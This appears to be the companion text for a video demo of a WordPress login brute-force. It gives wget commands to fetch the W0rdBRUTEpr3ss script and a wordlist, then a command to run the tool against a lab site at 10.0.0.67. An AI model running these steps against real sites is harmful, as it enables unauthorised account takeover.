
# Video Name: Wordpress Bruteforce Multithreading

# Features:

# 1) Multithreading
# 2) http and https protocols
# 3) Random User Agent
               
# Tested on Wordpress 3.x/4.x with Python 2.4/2.6/2.7

# Distribution: BackBox Linux 4.0

# Script written by:
#
#                    Claudio Viviani

#                    http://www.homelab.it
#                    info@homelab.it

#                    https://www.facebook.com/homelabit
#                    https://twitter.com/homelabit
#                    https://plus.google.com/+HomelabIt1/
#                    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


####################################################################
#
# This video is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this video.
# In any case you disagree with the above statement,stop here.
#
#####################################################################

Wordpress: http://10.0.0.67/wordpress

User: pippo

Pass: pippo


1) Download W0rdBRUTEpr3ss:

wget http://www.homelab.it/wp-content/uploads/2014/11/W0rdBRUTEpr3ss_v1_0.py_.txt


2) Download wordlist:

Example:

wget http://bright-shadows.net/download/wordlists/all-word.txt


3) Insert true password into wordlist ( for video demostration)


4) Run W0rdBRUTEpr3ss:

python W0rdBRUTEpr3ss_v1_0.py -t TARGET_URL -u USER -w WORDLIST_FILE

python W0rdBRUTEpr3ss_v1_0.py -t http://10.0.0.67/wordpress -u pippo -w all-word.txt


5) Connect to wordpress login page:

http://10.0.0.67/wordpress/wp-login.php